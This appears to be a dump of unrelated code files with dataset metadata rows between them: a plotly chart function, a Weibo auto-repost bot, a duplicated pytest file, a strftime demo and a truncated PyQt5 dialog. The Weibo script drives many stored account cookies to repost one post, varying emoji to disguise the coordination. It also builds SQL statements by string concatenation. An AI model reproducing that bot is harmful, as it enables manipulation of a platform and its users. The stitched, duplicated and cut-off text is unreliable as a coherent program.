    fig.append_trace(cpa_ly, 4, 1)  # 10
    fig.append_trace(cpa_yoy, 4, 1)  # 11
    fig.append_trace(cps_ty, 5, 1)  # 12
    fig.append_trace(cps_ly, 5, 1)  # 13
    fig.append_trace(cps_yoy, 5, 1)  # 14
    fig.append_trace(cr_ty, 6, 1)  # 15
    fig.append_trace(cr_ly, 6, 1)  # 16
    fig.append_trace(cr_yoy, 6, 1)  # 17
    # Move every YoY bar (every third trace) onto its own right-hand axis.
    # Integer index below is the index of the trace; yaxis indices start
    # from (number of graphs + 1) since they sit on the right side, and
    # each overlays/anchors onto the axes of its own subplot.
    fig['data'][2].update(yaxis='y7')
    fig['layout']['yaxis7'] = dict(overlaying='y1', anchor='x1', side='right', showgrid=False, title='% Change YoY')
    fig['data'][5].update(yaxis='y8')
    fig['layout']['yaxis8'] = dict(overlaying='y2', anchor='x2', side='right', showgrid=False, title='% Change YoY')
    fig['data'][8].update(yaxis='y9')
    fig['layout']['yaxis9'] = dict(overlaying='y3', anchor='x3', side='right', showgrid=False, title='% Change YoY')
    fig['data'][11].update(yaxis='y10')
    fig['layout']['yaxis10'] = dict(overlaying='y4', anchor='x4', side='right', showgrid=False, title='% Change YoY')
    fig['data'][14].update(yaxis='y11')
    fig['layout']['yaxis11'] = dict(overlaying='y5', anchor='x5', side='right', showgrid=False, title='% Change YoY')
    fig['data'][17].update(yaxis='y12')
    fig['layout']['yaxis12'] = dict(overlaying='y6', anchor='x6', side='right', showgrid=False, title='% Change YoY')
    fig['layout']['xaxis'].update(title='Week of the Year' + ' - ' + str(current_year))
    # Shrink the subplot-title annotation font.
    for i in fig['layout']['annotations']:
        i['font'] = dict(size=12,
                         # color='#ff0000'
                         )
    fig['layout'].update(
        height= 1500,
        # width=750,
        showlegend=False,
        xaxis=dict(
            # tickmode='linear',
            # ticks='outside',
            # tick0=1,
            dtick=5,
            ticklen=8,
            tickwidth=2,
            tickcolor='#000',
            showgrid=True,
            zeroline=True,
            # showline=True,
            # mirror='ticks',
            # gridcolor='#bdbdbd',
            gridwidth=2
        ),
    )
    updated_fig = fig
    return updated_fig
''' | 67.308733 | 217 | 0.66635 | 8,183 | 54,722 | 4.096419 | 0.032506 | 0.087348 | 0.174696 | 0.327914 | 0.892575 | 0.878792 | 0.854927 | 0.823156 | 0.786552 | 0.765789 | 0 | 0.011067 | 0.146303 | 54,722 | 813 | 218 | 67.308733 | 0.706482 | 1.085121 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
3c3a79b737618608d59d8c871c633a8b41e8d75e | 9,139 | py | Python | auto_repost/main.py | susmote/WeiboTools | 659232b4525bcbedf350da1127d382ff6c6e9e71 | [
"MIT"
] | 3 | 2018-11-11T22:07:23.000Z | 2019-03-08T08:20:31.000Z | auto_repost/main.py | susmote/WeiboTools | 659232b4525bcbedf350da1127d382ff6c6e9e71 | [
"MIT"
] | null | null | null | auto_repost/main.py | susmote/WeiboTools | 659232b4525bcbedf350da1127d382ff6c6e9e71 | [
"MIT"
] | 1 | 2021-08-31T06:44:54.000Z | 2021-08-31T06:44:54.000Z | # -*- coding: utf-8 -*-
"""
Created on 2018/11/4
@author: susmote
"""
import requests
import json
import random
import time
rainbow_word_list = ["😀","😁","🤣","😂","😅","😆","😇","😉","😘","😙","😜","😝","😎","🤗"]
def auto_repost_func(weibolink, repostTopic, account_group, each_repost_count, printToGui , conn):
    """Automatically repost a Weibo post with every account in the group.

    Cycles over the account cookies round-robin for ``each_repost_count``
    rounds.  Each repost is prefixed with a random emoji so consecutive
    repost texts differ.  Accounts whose cookie is rejected as blocked
    (errno 20003 / 20034) are flagged in the ``WeiboCookies`` table.

    :param weibolink: URL of the target Weibo post (its last 16 characters
        are taken as the numeric post id)
    :param repostTopic: topic text appended after the random emoji
    :param account_group: list of cookie strings, one per account
    :param each_repost_count: number of repost rounds to run
    :param printToGui: callback used to echo progress to the GUI
    :param conn: sqlite3 connection holding the ``WeiboCookies`` table
    :return: 0 when all rounds are finished
    """
    printToGui("微博自动转发")
    # Start with an out-of-range emoji index so the first draw never repeats.
    next_rannum = 20
    repost_count = 1
    begin_time = time.time()
    print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
    printToGui(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
    account_index = 0
    while(True):
        session = requests.session()
        headers = {
            "Host": "m.weibo.cn",
            "Referer": "https://m.weibo.cn/compose/repost",
            "Cookie": account_group[account_index]
        }
        # Draw a random emoji; if it repeats the previous one, retry the loop.
        random_num = random.randint(0, len(rainbow_word_list) - 1)
        if(random_num != next_rannum):
            next_rannum = random_num
            repost_content = rainbow_word_list[next_rannum]+repostTopic
            # NOTE(review): assumes the post id is exactly the last 16
            # characters of the link - confirm for all link formats.
            repost_id = int(weibolink[-16:len(weibolink)])
            repost_url = "https://m.weibo.cn/api/statuses/repost"
            st_url = "https://m.weibo.cn/api/config"
            # Fetch the session token ("st") required by the repost endpoint.
            login_data = session.get(st_url, headers=headers).text
            login_data_json = json.loads(login_data)["data"]
            postdata = {
                "id": repost_id,
                "content": repost_content,
                "mid": repost_id,
                "st":login_data_json["st"]
            }
            res = session.post(repost_url, data=postdata, headers=headers)
            if res.text != "File not found.\n":
                print("".center(30, "*"))
                printToGui(str("".center(30, "*")))
                print("账号id " + str(account_index + 1))
                printToGui("账号id " + str(account_index + 1))
                res_json = json.loads(res.text)
                if res_json["ok"] == 0:
                    # API error; 20003 / 20034 mean the account is blocked
                    # and needs phone verification - record that in the DB.
                    print(res_json)
                    printToGui(str(res_json))
                    if res_json["errno"] == "20003" or res_json["errno"] == "20034":
                        c = conn.cursor()
                        update_cmd = "UPDATE WeiboCookies SET STATE=\'号已被封禁,需要手机验证解封\' WHERE \"COOKIES\" = " + "\"" + account_group[account_index] + "\""
                        c.execute(update_cmd)
                        conn.commit()
                        printToGui(res_json["msg"])
                # Last account of the round: pause, then restart at account 0.
                if account_index == len(account_group)-1:
                    print("第" + str(repost_count) + "轮结束")
                    printToGui("第" + str(repost_count) + "轮结束")
                    repost_count += 1
                    account_index = 0
                    time.sleep(20)
                    continue
                # All requested rounds done: report timing and stop.
                if repost_count == each_repost_count+1:
                    end_time = time.time()
                    print("转发结束")
                    printToGui("转发全部结束")
                    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                    printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                    spend_time = end_time - begin_time
                    print("共花费" + str(spend_time) + "秒")
                    printToGui("共花费" + str(spend_time) + "秒")
                    return 0
                else:
                    account_index += 1
                    continue
            else:
                # Response body "File not found." => this cookie is not
                # logged in / not bound to an account.
                print("账号id "+str(account_index + 1)+" 此号未绑定")
                printToGui("账号id "+str(account_index + 1)+"此号未绑定")
                print("".center(30, "*"))
                printToGui(str("".center(30, "*")))
                # NOTE(review): this branch compares against
                # len(account_group) while the bound branch above uses
                # len(account_group)-1; the index cannot equal
                # len(account_group) here without first indexing out of
                # range at the top of the loop - confirm intent.
                if account_index == len(account_group):
                    print("第" + str(repost_count + 1) + "轮结束")
                    printToGui("第" + str(repost_count + 1) + "轮结束")
                    time.sleep(20)
                    repost_count += 1
                    account_index = 0
                    continue
                if repost_count == each_repost_count+1:
                    end_time = time.time()
                    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                    printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                    spend_time = end_time - begin_time
                    print("共花费" + str(spend_time) + "秒")
                    printToGui("共花费" + str(spend_time) + "秒")
                    return 0
                else:
                    account_index += 1
                    continue
        else:
            continue
def auto_repost_test_func(weibolink, account_group, each_repost_count, printToGui , conn):
    """Test variant of the automatic repost loop.

    Like :func:`auto_repost_func` but: the repost content is only the
    random emoji (no topic text), blocked cookies (errno 20003 / 20034)
    are DELETED from the ``WeiboCookies`` table instead of flagged, and
    the loop stops after a single pass over the whole account group.

    :param weibolink: URL of the target Weibo post (its last 16 characters
        are taken as the numeric post id)
    :param account_group: list of cookie strings, one per account
    :param each_repost_count: reposts to attempt per account
    :param printToGui: callback used to echo progress to the GUI
    :param conn: sqlite3 connection holding the ``WeiboCookies`` table
    :return: 0 when every account has been exercised
    """
    printToGui("微博自动转发")
    # Start with an out-of-range emoji index so the first draw never repeats.
    next_rannum = 20
    repost_count = 0
    take_count = 0
    begin_time = time.time()
    print(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
    printToGui(time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())))
    account_index = 0
    while(True):
        session = requests.session()
        headers = {
            "Host": "m.weibo.cn",
            "Referer": "https://m.weibo.cn/compose/repost",
            "Cookie": account_group[account_index]
        }
        # Draw a random emoji; if it repeats the previous one, retry the loop.
        random_num = random.randint(0, len(rainbow_word_list) - 1)
        if(random_num != next_rannum):
            repost_count += 1
            next_rannum = random_num
            repost_content = rainbow_word_list[next_rannum]
            # NOTE(review): assumes the post id is exactly the last 16
            # characters of the link - confirm for all link formats.
            repost_id = int(weibolink[-16:len(weibolink)])
            repost_url = "https://m.weibo.cn/api/statuses/repost"
            st_url = "https://m.weibo.cn/api/config"
            # Fetch the session token ("st") required by the repost endpoint.
            login_data = session.get(st_url, headers=headers).text
            login_data_json = json.loads(login_data)["data"]
            postdata = {
                "id": repost_id,
                "content": repost_content,
                "mid": repost_id,
                "st":login_data_json["st"]
            }
            res = session.post(repost_url, data=postdata, headers=headers)
            if res.text != "File not found.\n":
                res_json = json.loads(res.text)
                # Report either on an API error or once this account has
                # used up its repost budget.
                if res_json["ok"] == 0 or repost_count == each_repost_count:
                    print("".center(30, "*"))
                    printToGui(str("".center(30, "*")))
                    print("账号id " + str(account_index + 1))
                    printToGui("账号id " + str(account_index + 1))
                    if res_json["ok"] == 0:
                        print(res_json)
                        printToGui(str(res_json))
                        # Blocked account: remove its cookie entirely.
                        if res_json["errno"] == "20003" or res_json["errno"] == "20034":
                            c = conn.cursor()
                            delete_cmd = "DELETE FROM WeiboCookies WHERE \"COOKIES\" = " + "\"" + account_group[account_index] + "\""
                            c.execute(delete_cmd)
                            conn.commit()
                            printToGui(res_json["msg"])
                    # NOTE(review): 'comment_count' is never read; this line
                    # probably meant to reset 'repost_count' for the next
                    # account - confirm.
                    comment_count = 0
                    account_index+=1
                    if account_index == len(account_group):
                        print("第" + str(take_count+1) + "轮结束")
                        printToGui("第" + str(take_count+1) + "轮结束")
                        end_time = time.time()
                        print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                        printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                        spend_time = end_time - begin_time
                        print("共花费"+ str(spend_time) +"秒")
                        printToGui("共花费"+ str(spend_time) +"秒")
                        take_count += 1
                        return 0
                    else:
                        continue
                else:
                    continue
            else:
                # Response body "File not found." => this cookie is not
                # logged in / not bound to an account.
                print("账号id "+str(account_index + 1)+" 此号未绑定")
                printToGui("账号id "+str(account_index + 1)+"此号未绑定")
                print("".center(30, "*"))
                printToGui(str("".center(30, "*")))
                account_index += 1
                if account_index == len(account_group):
                    print("第" + str(take_count + 1) + "轮结束")
                    printToGui("第" + str(take_count + 1) + "轮结束")
                    end_time = time.time()
                    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                    printToGui(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time())))
                    spend_time = end_time - begin_time
                    print("共花费" + str(spend_time) + "秒")
                    printToGui("共花费" + str(spend_time) + "秒")
                    take_count += 1
                    return 0
                else:
                    continue
        else:
            continue
| 43.312796 | 153 | 0.47817 | 974 | 9,139 | 4.322382 | 0.148871 | 0.045606 | 0.037055 | 0.039905 | 0.910451 | 0.898812 | 0.862945 | 0.847268 | 0.826366 | 0.81734 | 0 | 0.01781 | 0.379473 | 9,139 | 210 | 154 | 43.519048 | 0.722095 | 0.034358 | 0 | 0.839779 | 0 | 0 | 0.10495 | 0.009146 | 0.01105 | 0 | 0 | 0 | 0 | 1 | 0.01105 | false | 0 | 0.022099 | 0 | 0.055249 | 0.309392 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
3c4b2bd46f9b1e1bbf350e29a9139b2c73a0a96a | 1,452 | py | Python | tests/test_927.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | tests/test_927.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | tests/test_927.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import pytest
"""
Test 927. Three Equal Parts
"""
@pytest.fixture(scope="session")
def init_variables_927():
    """Session-scoped fixture: yields a factory returning one shared Solution."""
    from src.leetcode_927_three_equal_parts import Solution

    shared_solution = Solution()

    def _factory():
        return shared_solution

    yield _factory
class TestClass927:
    """Tests for LeetCode 927 - Three Equal Parts."""

    def test_solution_0(self, init_variables_927):
        solver = init_variables_927()
        assert solver.threeEqualParts([1, 0, 1, 0, 1]) == [0, 3]

    def test_solution_1(self, init_variables_927):
        solver = init_variables_927()
        assert solver.threeEqualParts([1, 1, 0, 1, 1]) == [-1, -1]

    def test_solution_2(self, init_variables_927):
        solver = init_variables_927()
        assert solver.threeEqualParts([1, 1, 0, 0, 1]) == [0, 2]
#!/usr/bin/env python
import pytest
"""
Test 927. Three Equal Parts
"""
@pytest.fixture(scope="session")
def init_variables_927():
    """Session-scoped fixture: yields a factory returning one shared Solution."""
    from src.leetcode_927_three_equal_parts import Solution

    shared_solution = Solution()

    def _factory():
        return shared_solution

    yield _factory
class TestClass927:
    """Tests for LeetCode 927 - Three Equal Parts."""

    def test_solution_0(self, init_variables_927):
        solver = init_variables_927()
        assert solver.threeEqualParts([1, 0, 1, 0, 1]) == [0, 3]

    def test_solution_1(self, init_variables_927):
        solver = init_variables_927()
        assert solver.threeEqualParts([1, 1, 0, 1, 1]) == [-1, -1]

    def test_solution_2(self, init_variables_927):
        solver = init_variables_927()
        assert solver.threeEqualParts([1, 1, 0, 0, 1]) == [0, 2]
| 23.047619 | 80 | 0.684573 | 204 | 1,452 | 4.578431 | 0.156863 | 0.250535 | 0.308351 | 0.12848 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.101868 | 0.188705 | 1,452 | 62 | 81 | 23.419355 | 0.691002 | 0.027548 | 0 | 1 | 0 | 0 | 0.010448 | 0 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.333333 | false | 0 | 0.133333 | 0.066667 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 11 |
b1f52f459ac8752edaaa39221808b66fe8fb2c13 | 722 | py | Python | PythonHomework/P151T5.6.py | qw98qw98/colleageTime | 4166d19eb1fbbbe63d20301d4b93013b3a0a0d5d | [
"MIT"
] | 2 | 2019-04-24T09:17:26.000Z | 2019-04-25T02:32:26.000Z | PythonHomework/P151T5.6.py | qw98qw98/colleageTime | 4166d19eb1fbbbe63d20301d4b93013b3a0a0d5d | [
"MIT"
] | null | null | null | PythonHomework/P151T5.6.py | qw98qw98/colleageTime | 4166d19eb1fbbbe63d20301d4b93013b3a0a0d5d | [
"MIT"
] | null | null | null | from datetime import *
# Demonstrate datetime.strftime with a fixed date (1999-09-17):
# year/month/day, day-of-year (%j), weekday names (%A/%a), month
# abbreviation (%b) and week numbers (%w/%W).
birthday = datetime(1999, 9, 17)
print(birthday.date())
for pattern in (
    "Mybitthday is|%Y-%m-%d|",
    "Mybitthday is|%Y-%m-%d|,the %j in a year",
    "in %A |%Y-%m-%d| I was born.",
    "in %a |%Y-%m-%d| I was born.",
    "in %b %a |%Y-%m-%d| I was born.",
    " |%Y-%m-%d| I was born, in week %w,the %Wth Week in a year.",
    " __%Y**%m**%d__ I was born, in week %w,the %Wth Week in a year.",
    " __%Y**%m**%d__%Y.%m.%d.",
    "%Y:%m:%d.",
):
    print(birthday.strftime(pattern))
| 60.166667 | 102 | 0.644044 | 142 | 722 | 3.21831 | 0.183099 | 0.284464 | 0.371991 | 0.393873 | 0.940919 | 0.897155 | 0.897155 | 0.897155 | 0.897155 | 0.80744 | 0 | 0.1059 | 0.084488 | 722 | 11 | 103 | 65.636364 | 0.585477 | 0 | 0 | 0 | 0 | 0.181818 | 0.422438 | 0.031856 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0.909091 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 11 |
b1fe165e03aab89ea6cccd56998cefffc293644a | 12,834 | py | Python | tasks_completed.py | DivyamKakkar24/Farm-Widgets | a731e67732d421f230dc3ebd11c217033ee4fc52 | [
"MIT"
] | 2 | 2020-07-03T08:42:38.000Z | 2020-11-20T07:58:55.000Z | tasks_completed.py | divyamkakkar24/Farm-Widgets | a731e67732d421f230dc3ebd11c217033ee4fc52 | [
"MIT"
] | null | null | null | tasks_completed.py | divyamkakkar24/Farm-Widgets | a731e67732d421f230dc3ebd11c217033ee4fc52 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'tasks_completed.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sqlite3
class Ui_completed(object):
    """Qt Designer-generated UI for the "Completed Tasks" dialog.

    Builds a dialog holding a list widget (filled from the ``tasksdone``
    table of ``tasks.db``) above an Ok/Cancel button box.  Generated by
    pyuic5 - regenerate from ``tasks_completed.ui`` rather than
    hand-editing (see the header warning in this file).
    """

    def setupUi(self, completed):
        """Create, style and lay out all widgets on the ``completed`` dialog."""
        completed.setObjectName("completed")
        completed.resize(441, 282)
        # Dialog-wide palette: one solid brush per colour role for each of
        # the Active / Inactive / Disabled colour groups (cream/beige theme).
        palette = QtGui.QPalette()
        # --- Active colour group ---
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(169, 158, 139))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.PlaceholderText, brush)
        # --- Inactive colour group (same colours as Active) ---
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(169, 158, 139))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.PlaceholderText, brush)
        # --- Disabled colour group (greyed-out variants) ---
        brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
        brush = QtGui.QBrush(QtGui.QColor(254, 246, 231))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
        brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
        brush = QtGui.QBrush(QtGui.QColor(169, 158, 139))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
        brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
        brush = QtGui.QBrush(QtGui.QColor(126, 118, 104))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
        brush = QtGui.QBrush(QtGui.QColor(253, 237, 208))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0, 128))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.PlaceholderText, brush)
        completed.setPalette(palette)
        self.gridLayout = QtWidgets.QGridLayout(completed)
        self.gridLayout.setObjectName("gridLayout")
        # List widget showing the completed tasks (filled by display()).
        self.list1 = QtWidgets.QListWidget(completed)
        # 13pt font for the task list entries.
        font = QtGui.QFont()
        font.setPointSize(13)
        self.list1.setFont(font)
        # List-widget palette: white base with black text, darker when disabled.
        palette = QtGui.QPalette()
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
        brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
        brush.setStyle(QtCore.Qt.SolidPattern)
        palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
        brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
        brush.setStyle(QtCore.Qt.SolidPattern)
